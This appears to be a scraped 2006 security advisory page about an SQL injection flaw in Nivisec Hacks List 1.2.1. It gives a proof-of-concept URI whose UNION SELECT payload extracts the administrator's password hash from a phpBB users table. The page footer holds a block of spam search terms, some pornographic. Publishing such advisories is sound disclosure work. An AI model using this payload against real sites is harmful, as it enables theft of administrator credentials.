about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Nivisec Hacks List HACK_ID SQL Injection Vulnerability


Title Nivisec Hacks List HACK_ID SQL Injection Vulnerability
Published 2006-11-26-12:00AM
Updated 2006-11-28-09:40PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  the master is credited with the discovery of this vulnerability.
Vulnerable  Nivisec Hacks List 1.2.1
Not Vulnerable  
Code   An attacker can exploit this issue via a web client.

The following prof-of-concept URI is available:

http://example.com/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 13:40:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Picturs se Bangladesh Svi pornic htimage Easypic.co free-zz.cn news for c Www.srayas www.xxx.se 200 /compo Shahilla+s dragon fab www.89.co www.jcwh88 www.znhr.z ph proxy.h Pron star www.pyoyi. www.dbrsw. www.zhmf51 www.trish www.parkwa maxcpm.inf Xxxfreemov telugisex4 unblockin yoomla 1.0 clam WWW.WOMENS www.89.co CMS is Fre sex teen v www.sosody www.masa.s tamil musi www.ngex.c i...m//plu svftp Video XXX My Name Is i...m//plu www.sxs.co www.indian WWW.3PIC.C www.sexyin www.asspor Crack Data www.asspor WWW.3PIC.C news for c